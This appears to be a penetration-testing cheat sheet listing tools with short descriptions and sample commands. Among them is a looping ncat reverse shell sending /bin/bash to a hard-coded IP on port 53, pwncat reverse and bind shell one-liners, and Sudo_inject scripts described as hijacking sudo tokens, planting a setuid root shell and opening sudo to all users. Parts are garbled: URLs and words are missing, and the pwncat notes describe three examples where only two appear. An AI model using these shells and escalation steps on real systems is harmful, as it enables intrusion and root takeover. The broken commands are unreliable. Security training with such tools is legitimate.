Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-host task sharing, and more.

SearchSploit – Simple way to search for vulnerabilities on a local copy of the.
sudo -V | grep "Sudo ver"
searchsploit "sudo 1.9.5p1"
Other sources of vulns/exploits are the NIST Search Vulnerability Database, Mitre CVE, and the CVE Program Mission.

SuBruteForce – Full throttle to get access as a specific user.

Sudo_inject – Injects a process that has a valid sudo token and activates our own sudo token.
bash exploit.sh
Will create the binary activate_sudo_token in /tmp. You can use it to activate the sudo token in your session.
bash exploit_v2.sh
Will create a sh shell in /tmp owned by root with setuid.
bash exploit_v3.sh
Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo.

Foremost – A forensics tool to recover files based on headers and footers from a disk or image file.

Zsteg – A Ruby application to detect and extract hidden data in image files.
sudo gem install zsteg

ExifTool – An application for reading and writing meta information in a wide variety of files.

GDB – The GNU Project debugger, allows one to see what is going on 'inside' a program while it executes or what a program was 'doing' at the moment it crashed. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly, registers, and memory information during debugging, and adds extra commands.

SublimeText – A very sophisticated text editor for code and markup.
wget -qO - | sudo apt-key add -
echo "deb apt/stable/" | sudo tee /etc/apt//sublime-text.list

NCat – A NetCat version by NMAP that accepts SSL.
while true; do ncat --ssl -v 174.88.217.186 53 -e /bin/bash; sleep 5; done
python3 -c 'import pty; pty.spawn("/bin/bash")'

PwnCat – A sophisticated bind and reverse shell handler with many features, as well as a drop-in replacement or compatible complement to netcat, ncat or socat.
pwncat -e '/bin/bash' 4444 --reconn --reconn-wait 1
pwncat -e '/bin/bash' 4444 -u --ping-intvl 1
The first example will keep listening (blind) even after a disconnect. The second and third are reverse shells that reconnect if Ctrl+C interrupts them, but the third works over UDP.

SeatBelt – Performs a number of security-oriented host-survey safety checks.

GoBuster – A tool to brute-force and discover directories, files, and subdomains.
gobuster dir -e -t 50 -u -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d -w subdomains.txt --wildcard
The first example uses -w to set the wordlist file, -u to set the URL or domain, -e for expanded mode, and -t to define the number of threads. The second example looks for subdomains using dns -d, and --wildcard properly detects the existence of a wildcard (*.) entry.

SSHuttle – Creates a VPN over an SSH tunnel and allows pivoting laterally into the network. It does not require any installation or root access on the host machine; only SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN. Use the argument -r to set the credentials to log in to the host, followed by the network you want to reach over the VPN (192.168.0.0/16 in this example); with --dns all the DNS requests will also be tunneled, and 0/0 means that all the traffic must go through the VPN as well.

BloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups). Run the most recent version of the collector file in PowerShell on a Windows machine that is joined to the Active Directory, then transfer the output to the machine where BloodHound will analyze it. BloodHound can be installed using the official tutorial, or if you are using Kali just follow the commands:
sudo apt-get install bloodhound -y
Go to the page and enter neo4j as user and password, then change them on the next page. Use the credentials changed above to connect and import the acquired output files into BloodHound.

Evil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol. This app gives a remote PowerShell prompt. It can run locally or in a docker container.